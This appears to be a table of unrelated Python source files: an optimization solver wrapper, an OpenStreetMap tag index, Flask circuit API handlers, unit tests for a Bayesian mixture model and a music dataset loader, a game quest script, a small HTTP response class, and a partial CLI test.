id | content
---|---
22068
|
import attr
import types
from typing import Union
from enum import Enum
import numpy as np
from scipy.optimize import differential_evolution
import pygmo as pg
class OptimizationMethod(Enum):
"""
Available optimization solvers.
"""
SCIPY_DE = 1
PYGMO_DE1220 = 2
@attr.s(auto_attribs=True)
class ScipyDifferentialEvolutionSettings:
"""
Optional arguments to pass for SciPy's differential evolution caller.
Members
----------------
:ivar str strategy:
        The differential evolution strategy to use. Should be one of: 'best1bin', 'best1exp', 'rand1exp',
        'randtobest1exp', 'currenttobest1exp', 'best2exp', 'rand2exp', 'randtobest1bin', 'currenttobest1bin',
        'best2bin', 'rand2bin', 'rand1bin'. The default is 'best1bin'.
:ivar float recombination:
The recombination constant, should be in the range [0, 1]. In the literature this is also known as the crossover
probability, being denoted by CR. Increasing this value allows a larger number of mutants to progress into the
next generation, but at the risk of population stability.
:ivar float mutation:
The mutation constant. In the literature this is also known as differential weight, being denoted by F. If
specified as a float it should be in the range [0, 2].
:ivar float tol:
        Relative tolerance for convergence. Solving stops when
        `np.std(pop) <= atol + tol * np.abs(np.mean(population_energies))`, where `atol` and `tol` are the
        absolute and relative tolerances, respectively.
:ivar int|numpy.random.RandomState seed:
        If `seed` is not specified, the `np.random.RandomState` singleton is used. If `seed` is an int, a new
        `np.random.RandomState` instance is used, seeded with `seed`. If `seed` is already a
        `np.random.RandomState` instance, then that instance is used. Specify `seed` for repeatable minimizations.
:ivar int workers:
If `workers` is an int the population is subdivided into `workers` sections and evaluated in parallel
(uses `multiprocessing.Pool`). Supply -1 to use all available CPU cores. Alternatively supply a map-like
callable, such as `multiprocessing.Pool.map` for evaluating the population in parallel. This evaluation is
carried out as `workers(func, iterable)`.
:ivar bool disp:
Display status messages during optimization iterations.
    :ivar bool polish:
If True (default), then `scipy.optimize.minimize` with the `L-BFGS-B` method is used to polish the best
population member at the end, which can improve the minimization slightly.
"""
number_of_decision_variables: int
strategy: str = 'best1bin'
recombination: float = 0.3
mutation: float = 0.6
tol: float = 1e-5
seed: Union[np.random.RandomState, int] = np.random.RandomState()
workers: int = 1
disp: bool = False
polish: bool = True
popsize: int = None
population_size_for_each_variable: int = 15
total_population_size_limit: int = 100
def __attrs_post_init__(self):
if self.popsize is None:
self.popsize = self._estimate_population_size()
elif self.popsize <= 0:
raise ValueError('Number of individuals must be greater than 0.')
if type(self.popsize) != int:
raise TypeError('Population size must be an integer number.')
if not 0 < self.recombination <= 1:
raise ValueError('Recombination must be a value between 0 and 1.')
if type(self.mutation) == tuple:
mutation_dithering_array = np.array(self.mutation)
if len(self.mutation) > 2:
raise ValueError('Mutation can be a tuple with two numbers, not more.')
if mutation_dithering_array.min() < 0 or mutation_dithering_array.max() > 2:
raise ValueError('Mutation must be floats between 0 and 2.')
elif mutation_dithering_array.min() == mutation_dithering_array.max():
raise ValueError("Values for mutation dithering can't be equal.")
else:
if type(self.mutation) != int and type(self.mutation) != float:
raise TypeError('When mutation is provided as a single number, it must be a float or an int.')
if not 0 < self.mutation < 2:
raise ValueError('Mutation must be a number between 0 and 2.')
if self.tol < 0:
raise ValueError('Tolerance must be a positive float.')
def _estimate_population_size(self):
population_size = self.population_size_for_each_variable * self.number_of_decision_variables
if population_size > self.total_population_size_limit:
population_size = self.total_population_size_limit
return population_size
@attr.s(auto_attribs=True)
class PygmoSelfAdaptiveDESettings:
# TODO: docs and validations
gen: int
popsize: int
    allowed_variants: list = attr.Factory(lambda: [2, 6, 7])
variant_adptv: int = 2
ftol: float = 1e-6
xtol: float = 1e-6
memory: bool = True
seed: int = int(np.random.randint(0, 2000))
polish: bool = True
polish_method: str = 'tnewton_precond_restart'
parallel_execution: bool = False
number_of_islands: int = 2
archipelago_gen: int = 50
@attr.s(auto_attribs=True)
class PygmoOptimizationProblemWrapper:
# TODO: docs and validations
objective_function: types.FunctionType
bounds: list
    args: list = attr.Factory(list)
def fitness(self, x):
return [self.objective_function(x, *self.args)]
def get_bounds(self):
return self._transform_bounds_to_pygmo_standard
def gradient(self, x):
return pg.estimate_gradient_h(lambda x: self.fitness(x), x)
@property
def _transform_bounds_to_pygmo_standard(self):
bounds_numpy = np.array(self.bounds, dtype=np.float64)
lower_bounds = list(bounds_numpy[:, 0])
upper_bounds = list(bounds_numpy[:, 1])
return lower_bounds, upper_bounds
@attr.s(auto_attribs=True)
class PygmoSolutionWrapperSerial:
# TODO: docs and validations
solution: pg.core.population
@property
def fun(self):
return self.solution.champion_f
@property
def x(self):
return self.solution.champion_x
@attr.s(auto_attribs=True)
class PygmoSolutionWrapperParallel:
# TODO: docs and validations
champion_x: np.ndarray
champion_f: Union[float, np.float64, np.ndarray]
@property
def fun(self):
return self.champion_f
@property
def x(self):
return self.champion_x
@attr.s(auto_attribs=True)
class OptimizationProblem:
"""
This class stores and solve optimization problems with the available solvers.
"""
# TODO: docs and validations
objective_function: types.FunctionType
bounds: list
optimization_method: OptimizationMethod
solver_args: Union[ScipyDifferentialEvolutionSettings, PygmoSelfAdaptiveDESettings]
    args: list = attr.Factory(list)
def __attrs_post_init__(self):
if self.optimization_method == OptimizationMethod.SCIPY_DE and self.solver_args is None:
self.solver_args = ScipyDifferentialEvolutionSettings(self._number_of_decision_variables)
@property
def _number_of_decision_variables(self):
return len(self.bounds)
def solve_minimization(self):
if self.optimization_method == OptimizationMethod.SCIPY_DE:
result = differential_evolution(
self.objective_function,
bounds=self.bounds,
args=self.args,
strategy=self.solver_args.strategy,
popsize=self.solver_args.popsize,
recombination=self.solver_args.recombination,
mutation=self.solver_args.mutation,
tol=self.solver_args.tol,
disp=self.solver_args.disp,
polish=self.solver_args.polish,
seed=self.solver_args.seed,
workers=self.solver_args.workers
)
return result
elif self.optimization_method == OptimizationMethod.PYGMO_DE1220:
problem_wrapper = PygmoOptimizationProblemWrapper(
objective_function=self.objective_function,
bounds=self.bounds,
args=self.args
)
pygmo_algorithm = pg.algorithm(
pg.de1220(
gen=self.solver_args.gen,
allowed_variants=self.solver_args.allowed_variants,
variant_adptv=self.solver_args.variant_adptv,
ftol=self.solver_args.ftol,
xtol=self.solver_args.xtol,
memory=self.solver_args.memory,
seed=self.solver_args.seed
)
)
pygmo_problem = pg.problem(problem_wrapper)
if self.solver_args.parallel_execution:
solution_wrapper = self._run_pygmo_parallel(
pygmo_algorithm,
pygmo_problem,
number_of_islands=self.solver_args.number_of_islands,
archipelago_gen=self.solver_args.archipelago_gen
)
else:
pygmo_solution = self._run_pygmo_serial(pygmo_algorithm, pygmo_problem)
if self.solver_args.polish:
pygmo_solution = self._polish_pygmo_population(pygmo_solution)
solution_wrapper = PygmoSolutionWrapperSerial(pygmo_solution)
return solution_wrapper
else:
raise NotImplementedError('Unavailable optimization method.')
@staticmethod
def _select_best_pygmo_archipelago_solution(champions_x, champions_f):
best_index = np.argmin(champions_f)
return champions_x[best_index], champions_f[best_index]
def _run_pygmo_parallel(self, algorithm, problem, number_of_islands=2, archipelago_gen=50):
pygmo_archipelago = pg.archipelago(
n=number_of_islands,
algo=algorithm,
prob=problem,
pop_size=self.solver_args.popsize,
seed=self.solver_args.seed
)
pygmo_archipelago.evolve(n=archipelago_gen)
pygmo_archipelago.wait()
champions_x = pygmo_archipelago.get_champions_x()
champions_f = pygmo_archipelago.get_champions_f()
champion_x, champion_f = self._select_best_pygmo_archipelago_solution(champions_x, champions_f)
return PygmoSolutionWrapperParallel(champion_x=champion_x, champion_f=champion_f)
def _run_pygmo_serial(self, algorithm, problem):
population = pg.population(
prob=problem,
size=self.solver_args.popsize,
seed=self.solver_args.seed
)
solution = algorithm.evolve(population)
return solution
def _polish_pygmo_population(self, population):
pygmo_nlopt_wrapper = pg.nlopt(self.solver_args.polish_method)
nlopt_algorithm = pg.algorithm(pygmo_nlopt_wrapper)
solution_wrapper = nlopt_algorithm.evolve(population)
return solution_wrapper
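# --- Minimal usage sketch (illustrative, not part of the original module) ---
# Assumes the classes above are importable; the sphere objective below is
# purely an example of a callable accepted by OptimizationProblem.
def _example_scipy_de_usage():
    def sphere(x):
        return float(np.sum(np.asarray(x) ** 2))

    problem = OptimizationProblem(
        objective_function=sphere,
        bounds=[(-5.0, 5.0), (-5.0, 5.0)],
        optimization_method=OptimizationMethod.SCIPY_DE,
        solver_args=None,  # filled with ScipyDifferentialEvolutionSettings defaults in __attrs_post_init__
    )
    result = problem.solve_minimization()
    return result.x, result.fun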
|
22086
|
vals = {
"yes" : 0,
"residential" : 1,
"service" : 2,
"unclassified" : 3,
"stream" : 4,
"track" : 5,
"water" : 6,
"footway" : 7,
"tertiary" : 8,
"private" : 9,
"tree" : 10,
"path" : 11,
"forest" : 12,
"secondary" : 13,
"house" : 14,
"no" : 15,
"asphalt" : 16,
"wood" : 17,
"grass" : 18,
"paved" : 19,
"primary" : 20,
"unpaved" : 21,
"bus_stop" : 22,
"parking" : 23,
"parking_aisle" : 24,
"rail" : 25,
"driveway" : 26,
"8" : 27,
"administrative" : 28,
"locality" : 29,
"turning_circle" : 30,
"crossing" : 31,
"village" : 32,
"fence" : 33,
"grade2" : 34,
"coastline" : 35,
"grade3" : 36,
"farmland" : 37,
"hamlet" : 38,
"hut" : 39,
"meadow" : 40,
"wetland" : 41,
"cycleway" : 42,
"river" : 43,
"school" : 44,
"trunk" : 45,
"gravel" : 46,
"place_of_worship" : 47,
"farm" : 48,
"grade1" : 49,
"traffic_signals" : 50,
"wall" : 51,
"garage" : 52,
"gate" : 53,
"motorway" : 54,
"living_street" : 55,
"pitch" : 56,
"grade4" : 57,
"industrial" : 58,
"road" : 59,
"ground" : 60,
"scrub" : 61,
"motorway_link" : 62,
"steps" : 63,
"ditch" : 64,
"swimming_pool" : 65,
"grade5" : 66,
"park" : 67,
"apartments" : 68,
"restaurant" : 69,
"designated" : 70,
"bench" : 71,
"survey_point" : 72,
"pedestrian" : 73,
"hedge" : 74,
"reservoir" : 75,
"riverbank" : 76,
"alley" : 77,
"farmyard" : 78,
"peak" : 79,
"level_crossing" : 80,
"roof" : 81,
"dirt" : 82,
"drain" : 83,
"garages" : 84,
"entrance" : 85,
"street_lamp" : 86,
"deciduous" : 87,
"fuel" : 88,
"trunk_link" : 89,
"information" : 90,
"playground" : 91,
"supermarket" : 92,
"primary_link" : 93,
"concrete" : 94,
"mixed" : 95,
"permissive" : 96,
"orchard" : 97,
"grave_yard" : 98,
"canal" : 99,
"garden" : 100,
"spur" : 101,
"paving_stones" : 102,
"rock" : 103,
"bollard" : 104,
"convenience" : 105,
"cemetery" : 106,
"post_box" : 107,
"commercial" : 108,
"pier" : 109,
"bank" : 110,
"hotel" : 111,
"cliff" : 112,
"retail" : 113,
"construction" : 114,
"-1" : 115,
"fast_food" : 116,
"coniferous" : 117,
"cafe" : 118,
"6" : 119,
"kindergarten" : 120,
"tower" : 121,
"hospital" : 122,
"yard" : 123,
"sand" : 124,
"public_building" : 125,
"cobblestone" : 126,
"destination" : 127,
"island" : 128,
"abandoned" : 129,
"vineyard" : 130,
"recycling" : 131,
"agricultural" : 132,
"isolated_dwelling" : 133,
"pharmacy" : 134,
"post_office" : 135,
"motorway_junction" : 136,
"pub" : 137,
"allotments" : 138,
"dam" : 139,
"secondary_link" : 140,
"lift_gate" : 141,
"siding" : 142,
"stop" : 143,
"main" : 144,
"farm_auxiliary" : 145,
"quarry" : 146,
"10" : 147,
"station" : 148,
"platform" : 149,
"taxiway" : 150,
"limited" : 151,
"sports_centre" : 152,
"cutline" : 153,
"detached" : 154,
"storage_tank" : 155,
"basin" : 156,
"bicycle_parking" : 157,
"telephone" : 158,
"terrace" : 159,
"town" : 160,
"suburb" : 161,
"bus" : 162,
"compacted" : 163,
"toilets" : 164,
"heath" : 165,
"works" : 166,
"tram" : 167,
"beach" : 168,
"culvert" : 169,
"fire_station" : 170,
"recreation_ground" : 171,
"bakery" : 172,
"police" : 173,
"atm" : 174,
"clothes" : 175,
"tertiary_link" : 176,
"waste_basket" : 177,
"attraction" : 178,
"viewpoint" : 179,
"bicycle" : 180,
"church" : 181,
"shelter" : 182,
"drinking_water" : 183,
"marsh" : 184,
"picnic_site" : 185,
"hairdresser" : 186,
"bridleway" : 187,
"retaining_wall" : 188,
"buffer_stop" : 189,
"nature_reserve" : 190,
"village_green" : 191,
"university" : 192,
"1" : 193,
"bar" : 194,
"townhall" : 195,
"mini_roundabout" : 196,
"camp_site" : 197,
"aerodrome" : 198,
"stile" : 199,
"9" : 200,
"car_repair" : 201,
"parking_space" : 202,
"library" : 203,
"pipeline" : 204,
"true" : 205,
"cycle_barrier" : 206,
"4" : 207,
"museum" : 208,
"spring" : 209,
"hunting_stand" : 210,
"disused" : 211,
"car" : 212,
"tram_stop" : 213,
"land" : 214,
"fountain" : 215,
"hiking" : 216,
"manufacture" : 217,
"vending_machine" : 218,
"kiosk" : 219,
"swamp" : 220,
"unknown" : 221,
"7" : 222,
"islet" : 223,
"shed" : 224,
"switch" : 225,
"rapids" : 226,
"office" : 227,
"bay" : 228,
"proposed" : 229,
"common" : 230,
"weir" : 231,
"grassland" : 232,
"customers" : 233,
"social_facility" : 234,
"hangar" : 235,
"doctors" : 236,
"stadium" : 237,
"give_way" : 238,
"greenhouse" : 239,
"guest_house" : 240,
"viaduct" : 241,
"doityourself" : 242,
"runway" : 243,
"bus_station" : 244,
"water_tower" : 245,
"golf_course" : 246,
"conservation" : 247,
"block" : 248,
"college" : 249,
"wastewater_plant" : 250,
"subway" : 251,
"halt" : 252,
"forestry" : 253,
"florist" : 254,
"butcher" : 255}
def getValues():
return vals
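# Small usage sketch: the mapping above is value-unique, so an inverse
# (index -> label) table can be built directly. `getLabels` is an illustrative
# helper, not part of the original module.
def getLabels():
    return {index: label for label, index in vals.items()}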
|
22112
|
from app.models import Circuit, CircuitSchema, Provider
from flask import make_response, jsonify
from app import db
def read_all():
"""
This function responds to a request for /circuits
with the complete lists of circuits
:return: sorted list of circuits
"""
circuits = Circuit.query.all()
schema = CircuitSchema(many=True)
return schema.dump(circuits).data
def read_one(circuit_id):
circuit = Circuit.query.filter(Circuit.id == circuit_id).one_or_none()
if not circuit:
text = f'circuit not found for id {circuit_id}'
return make_response(jsonify(error=404, message=text), 404)
schema = CircuitSchema()
data = schema.dump(circuit).data
return data
def create(circuit):
"""
creates a circuit! checks to see if the provider_cid is unique and
that the provider exists.
:return: circuit
"""
provider_cid = circuit.get('provider_cid')
provider_id = circuit.get('provider_id')
circuit_exists = Circuit.query.filter(
Circuit.provider_cid == provider_cid
).one_or_none()
provider_exists = Provider.query.filter(Provider.id == provider_id).one_or_none()
if circuit_exists:
text = f'Circuit {provider_cid} already exists'
return make_response(jsonify(error=409, message=text), 409)
if not provider_exists:
        text = f'Provider {provider_id} does not exist. Unable to create circuit'
return make_response(jsonify(error=403, message=text), 403)
schema = CircuitSchema()
new_circuit = schema.load(circuit, session=db.session).data
db.session.add(new_circuit)
db.session.commit()
data = schema.dump(new_circuit).data
return data, 201
def update(circuit_id, circuit):
"""
updates a circuit!
:return: circuit
"""
c = Circuit.query.filter_by(id=circuit_id).one_or_none()
if not c:
        text = 'Cannot update a circuit that does not exist!'
        return make_response(jsonify(error=404, message=text), 404)
schema = CircuitSchema()
update = schema.load(circuit, session=db.session).data
db.session.merge(update)
db.session.commit()
data = schema.dump(c).data
return data, 201
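# A delete handler is sketched below for completeness; it mirrors the query /
# error-response pattern of the handlers above and is not part of the original module.
def delete(circuit_id):
    """
    deletes a circuit! (illustrative sketch)
    :return: 200 on success, 404 if the circuit does not exist
    """
    c = Circuit.query.filter_by(id=circuit_id).one_or_none()
    if not c:
        text = f'circuit not found for id {circuit_id}'
        return make_response(jsonify(error=404, message=text), 404)
    db.session.delete(c)
    db.session.commit()
    return make_response(jsonify(message=f'circuit {circuit_id} deleted'), 200)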
|
22208
|
import unittest
import shutil
import tempfile
import numpy as np
# import pandas as pd
# import pymc3 as pm
# from pymc3 import summary
# from sklearn.mixture import BayesianGaussianMixture as skBayesianGaussianMixture
from sklearn.model_selection import train_test_split
from pmlearn.exceptions import NotFittedError
from pmlearn.mixture import DirichletProcessMixture
class DirichletProcessMixtureTestCase(unittest.TestCase):
def setUp(self):
self.num_truncate = 3
self.num_components = 3
self.num_pred = 1
self.num_training_samples = 100
self.pi = np.array([0.35, 0.4, 0.25])
self.means = np.array([0, 5, 10])
self.sigmas = np.array([0.5, 0.5, 1.0])
self.components = np.random.randint(0,
self.num_components,
self.num_training_samples)
X = np.random.normal(loc=self.means[self.components],
scale=self.sigmas[self.components])
X.shape = (self.num_training_samples, 1)
self.X_train, self.X_test = train_test_split(X, test_size=0.3)
self.test_DPMM = DirichletProcessMixture()
self.test_nuts_DPMM = DirichletProcessMixture()
self.test_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.test_dir)
# class DirichletProcessMixtureFitTestCase(DirichletProcessMixtureTestCase):
# def test_advi_fit_returns_correct_model(self):
# # This print statement ensures PyMC3 output won't overwrite the test name
# print('')
# self.test_DPMM.fit(self.X_train)
#
# self.assertEqual(self.num_pred, self.test_DPMM.num_pred)
# self.assertEqual(self.num_components, self.test_DPMM.num_components)
# self.assertEqual(self.num_truncate, self.test_DPMM.num_truncate)
#
# self.assertAlmostEqual(self.pi[0],
# self.test_DPMM.summary['mean']['pi__0'],
# 0)
# self.assertAlmostEqual(self.pi[1],
# self.test_DPMM.summary['mean']['pi__1'],
# 0)
# self.assertAlmostEqual(self.pi[2],
# self.test_DPMM.summary['mean']['pi__2'],
# 0)
#
# self.assertAlmostEqual(
# self.means[0],
# self.test_DPMM.summary['mean']['cluster_center_0__0'],
# 0)
# self.assertAlmostEqual(
# self.means[1],
# self.test_DPMM.summary['mean']['cluster_center_1__0'],
# 0)
# self.assertAlmostEqual(
# self.means[2],
# self.test_DPMM.summary['mean']['cluster_center_2__0'],
# 0)
#
# self.assertAlmostEqual(
# self.sigmas[0],
# self.test_DPMM.summary['mean']['cluster_variance_0__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[1],
# self.test_DPMM.summary['mean']['cluster_variance_1__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[2],
# self.test_DPMM.summary['mean']['cluster_variance_2__0'],
# 0)
#
# def test_nuts_fit_returns_correct_model(self):
# # This print statement ensures PyMC3 output won't overwrite the test name
# print('')
# self.test_nuts_DPMM.fit(self.X_train,
# inference_type='nuts',
# inference_args={'draws': 1000,
# 'chains': 2})
#
# self.assertEqual(self.num_pred, self.test_nuts_DPMM.num_pred)
# self.assertEqual(self.num_components, self.test_nuts_DPMM.num_components)
# self.assertEqual(self.num_components, self.test_nuts_DPMM.num_truncate)
#
# self.assertAlmostEqual(self.pi[0],
# self.test_nuts_DPMM.summary['mean']['pi__0'],
# 0)
# self.assertAlmostEqual(self.pi[1],
# self.test_nuts_DPMM.summary['mean']['pi__1'],
# 0)
# self.assertAlmostEqual(self.pi[2],
# self.test_nuts_DPMM.summary['mean']['pi__2'],
# 0)
#
# self.assertAlmostEqual(
# self.means[0],
# self.test_nuts_DPMM.summary['mean']['cluster_center_0__0'],
# 0)
# self.assertAlmostEqual(
# self.means[1],
# self.test_nuts_DPMM.summary['mean']['cluster_center_1__0'],
# 0)
# self.assertAlmostEqual(
# self.means[2],
# self.test_nuts_DPMM.summary['mean']['cluster_center_2__0'],
# 0)
#
# self.assertAlmostEqual(
# self.sigmas[0],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_0__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[1],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_1__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[2],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_2__0'],
# 0)
#
#
class DirichletProcessMixturePredictTestCase(DirichletProcessMixtureTestCase):
# def test_predict_returns_predictions(self):
# print('')
# self.test_DPMM.fit(self.X_train, self.y_train)
# preds = self.test_DPMM.predict(self.X_test)
# self.assertEqual(self.y_test.shape, preds.shape)
# def test_predict_returns_mean_predictions_and_std(self):
# print('')
# self.test_DPMM.fit(self.X_train, self.y_train)
# preds, stds = self.test_DPMM.predict(self.X_test, return_std=True)
# self.assertEqual(self.y_test.shape, preds.shape)
# self.assertEqual(self.y_test.shape, stds.shape)
def test_predict_raises_error_if_not_fit(self):
print('')
with self.assertRaises(NotFittedError) as no_fit_error:
test_DPMM = DirichletProcessMixture()
test_DPMM.predict(self.X_train)
expected = 'Run fit on the model before predict.'
self.assertEqual(str(no_fit_error.exception), expected)
# class DirichletProcessMixtureScoreTestCase(DirichletProcessMixtureTestCase):
# def test_score_matches_sklearn_performance(self):
# print('')
# skDPMM = skBayesianGaussianMixture(n_components=3)
# skDPMM.fit(self.X_train)
# skDPMM_score = skDPMM.score(self.X_test)
#
# self.test_DPMM.fit(self.X_train)
# test_DPMM_score = self.test_DPMM.score(self.X_test)
#
# self.assertAlmostEqual(skDPMM_score, test_DPMM_score, 0)
#
#
# class DirichletProcessMixtureSaveAndLoadTestCase(DirichletProcessMixtureTestCase):
# def test_save_and_load_work_correctly(self):
# print('')
# self.test_DPMM.fit(self.X_train)
# score1 = self.test_DPMM.score(self.X_test)
# self.test_DPMM.save(self.test_dir)
#
# DPMM2 = DirichletProcessMixture()
# DPMM2.load(self.test_dir)
#
# self.assertEqual(self.test_DPMM.inference_type, DPMM2.inference_type)
# self.assertEqual(self.test_DPMM.num_pred, DPMM2.num_pred)
# self.assertEqual(self.test_DPMM.num_training_samples,
# DPMM2.num_training_samples)
# self.assertEqual(self.test_DPMM.num_truncate, DPMM2.num_truncate)
#
# pd.testing.assert_frame_equal(summary(self.test_DPMM.trace),
# summary(DPMM2.trace))
#
# score2 = DPMM2.score(self.X_test)
# self.assertAlmostEqual(score1, score2, 0)
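# Optional entry point; an assumption that this module may also be run directly
# with the unittest runner rather than only via pytest.
if __name__ == '__main__':
    unittest.main()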
|
22229
|
sm.setSpeakerID(1013000)
sm.sendNext("Ugh. This isn't going to work. I need something else. No plants. No meat. What, you have no idea? But you're the master, and you're older than me, too. You must know what'd be good for me!")
sm.setPlayerAsSpeaker()
sm.sendSay("#bBut I don't. It's not like age has anything to do with this...")
sm.setSpeakerID(1013000)
if sm.sendAskAccept("Since you're older, you must be more experienced in the world, too. Makes sense that you'd know more than me. Oh, fine. I'll ask someone who's even older than you, master!"):
if not sm.hasQuest(parentID):
sm.startQuest(parentID)
sm.setPlayerAsSpeaker()
sm.sendSayOkay("#b#b(You already asked Dad once, but you don't have any better ideas. Time to ask him again!)")
else:
sm.sendNext("No use trying to find an answer to this on my own. I'd better look for #bsomeone older and wiser than master#k!")
sm.dispose()
|
22239
|
import numpy as np
from tests.test_utils import run_track_tests
from mirdata import annotations
from mirdata.datasets import tonas
TEST_DATA_HOME = "tests/resources/mir_datasets/tonas"
def test_track():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
expected_attributes = {
"singer": "<NAME>",
"style": "Debla",
"title": "<NAME>",
"tuning_frequency": 451.0654725341684,
"f0_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.f0.Corrected",
"notes_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.notes.Corrected",
"audio_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.wav",
"track_id": "01-D_AMairena",
}
expected_property_types = {
"f0": annotations.F0Data,
"f0_automatic": annotations.F0Data,
"f0_corrected": annotations.F0Data,
"notes": annotations.NoteData,
"audio": tuple,
"singer": str,
"style": str,
"title": str,
"tuning_frequency": float,
}
run_track_tests(track, expected_attributes, expected_property_types)
def test_to_jams():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
jam = track.to_jams()
# Validate cante100 jam schema
assert jam.validate()
# Validate melody
f0 = jam.search(namespace="pitch_contour")[0]["data"]
assert [note.time for note in f0] == [0.197, 0.209, 0.221, 0.232]
assert [note.duration for note in f0] == [0.0, 0.0, 0.0, 0.0]
assert [note.value for note in f0] == [
{"index": 0, "frequency": 0.0, "voiced": False},
{"index": 0, "frequency": 379.299, "voiced": True},
{"index": 0, "frequency": 379.299, "voiced": True},
{"index": 0, "frequency": 379.299, "voiced": True},
]
print([note.confidence for note in f0])
assert [note.confidence for note in f0] == [3.09e-06, 2.86e-06, 7.15e-06, 1.545e-05]
    # Validate note transcription
notes = jam.search(namespace="note_hz")[0]["data"]
assert [note.time for note in notes] == [
0.216667,
0.65,
2.183333,
2.566667,
]
assert [note.duration for note in notes] == [
0.433333,
1.016667,
0.3833329999999999,
0.3333330000000001,
]
assert [note.value for note in notes] == [
388.8382625732775,
411.9597888711769,
388.8382625732775,
411.9597888711769,
]
assert [note.confidence for note in notes] == [None, None, None, None]
def test_load_melody():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
f0_path = track.f0_path
f0_data_corrected = tonas.load_f0(f0_path, True)
f0_data_automatic = tonas.load_f0(f0_path, False)
# check types
assert type(f0_data_corrected) == annotations.F0Data
assert type(f0_data_corrected.times) is np.ndarray
assert type(f0_data_corrected.frequencies) is np.ndarray
assert type(f0_data_corrected.voicing) is np.ndarray
assert type(f0_data_corrected._confidence) is np.ndarray
assert type(f0_data_automatic) == annotations.F0Data
assert type(f0_data_automatic.times) is np.ndarray
assert type(f0_data_automatic.frequencies) is np.ndarray
assert type(f0_data_corrected.voicing) is np.ndarray
assert type(f0_data_automatic._confidence) is np.ndarray
# check values
assert np.array_equal(
f0_data_corrected.times,
np.array([0.197, 0.209, 0.221, 0.232]),
)
assert np.array_equal(
f0_data_corrected.frequencies, np.array([0.000, 379.299, 379.299, 379.299])
)
assert np.array_equal(
f0_data_corrected.voicing,
np.array([0.0, 1.0, 1.0, 1.0]),
)
assert np.array_equal(
f0_data_corrected._confidence,
np.array([3.090e-06, 0.00000286, 0.00000715, 0.00001545]),
)
# check values
assert np.array_equal(
f0_data_automatic.times,
np.array([0.197, 0.209, 0.221, 0.232]),
)
assert np.array_equal(
f0_data_automatic.frequencies,
np.array(
[
0.000,
0.000,
143.918,
143.918,
]
),
)
assert np.array_equal(
f0_data_automatic.voicing,
np.array([0.0, 0.0, 1.0, 1.0]),
)
assert np.array_equal(
f0_data_automatic._confidence,
np.array([3.090e-06, 2.860e-06, 0.00000715, 0.00001545]),
)
def test_load_notes():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
notes_path = track.notes_path
notes_data = tonas.load_notes(notes_path)
tuning_frequency = tonas._load_tuning_frequency(notes_path)
# check types
assert type(notes_data) == annotations.NoteData
assert type(notes_data.intervals) is np.ndarray
assert type(notes_data.pitches) is np.ndarray
assert type(notes_data.confidence) is np.ndarray
assert type(tuning_frequency) is float
# check tuning frequency
assert tuning_frequency == 451.0654725341684
# check values
assert np.array_equal(
notes_data.intervals[:, 0], np.array([0.216667, 0.65, 2.183333, 2.566667])
)
assert np.array_equal(
notes_data.intervals[:, 1], np.array([0.65, 1.666667, 2.566666, 2.9])
)
assert np.array_equal(
notes_data.pitches,
np.array(
[388.8382625732775, 411.9597888711769, 388.8382625732775, 411.9597888711769]
),
)
assert np.array_equal(
notes_data.confidence,
np.array(
[
0.018007,
0.010794,
0.00698,
0.03265,
]
),
)
def test_load_audio():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
audio_path = track.audio_path
audio, sr = tonas.load_audio(audio_path)
assert sr == 44100
assert type(audio) is np.ndarray
def test_metadata():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
metadata = dataset._metadata
assert metadata[default_trackid] == {
"title": "En el barrio de Triana",
"style": "Debla",
"singer": "<NAME>",
}
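# Minimal usage sketch mirroring the fixtures above (TEST_DATA_HOME points at a
# tiny test excerpt, so this stays fast). The second positional argument of
# load_f0 selects the corrected contour, as exercised in test_load_melody.
def _example_tonas_usage():
    dataset = tonas.Dataset(TEST_DATA_HOME)
    track = dataset.track("01-D_AMairena")
    f0_corrected = tonas.load_f0(track.f0_path, True)
    audio, sr = tonas.load_audio(track.audio_path)
    return f0_corrected, audio, sr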
|
22267
|
class Response(object):
"""
"""
def __init__(self, status_code, text):
self.content = text
self.cached = False
self.status_code = status_code
self.ok = self.status_code < 400
@property
def text(self):
return self.content
def __repr__(self):
return 'HTTP {} {}'.format(self.status_code, self.content)
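# Minimal usage sketch (illustrative values): shows how `ok` is derived from the
# status code and how the body is exposed via `text`.
def _example_response_usage():
    resp = Response(404, 'not found')
    return resp.ok, resp.text, repr(resp)  # (False, 'not found', 'HTTP 404 not found')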
|
22272
|
import json
class TestListRepo:
def test_invalid(self, host):
result = host.run('stack list repo test')
assert result.rc == 255
assert result.stderr.startswith('error - ')
def test_args(self, host, add_repo):
# Add a second repo so we can make sure it is skipped
add_repo('test2', 'test2url')
        # Run list repo with just the test repo
result = host.run('stack list repo test output-format=json')
assert result.rc == 0
        # Make sure we got data only for the test repo
repo_data = json.loads(result.stdout)
assert len(repo_data) == 1
assert repo_data[0]['name'] == 'test'
# now get all of them
# assert both repos are in the list data
result = host.run('stack list repo output-format=json')
repo_data = json.loads(result.stdout)
assert len(repo_data) == 2
assert {'test', 'test2'} == {repo['name'] for repo in repo_data}
# now get all of them, by explicitly asking for them
# assert both repos are in the list data
result = host.run('stack list repo test test2 output-format=json')
new_repo_data = json.loads(result.stdout)
assert len(new_repo_data) == 2
assert {'test', 'test2'} == {repo['name'] for repo in new_repo_data}
def test_removed_not_listed(self, host, add_repo, revert_etc):
        # Run list repo with just the test repo
result = host.run('stack list repo test output-format=json')
assert result.rc == 0
        # Make sure we got data only for the test repo
repo_data = json.loads(result.stdout)
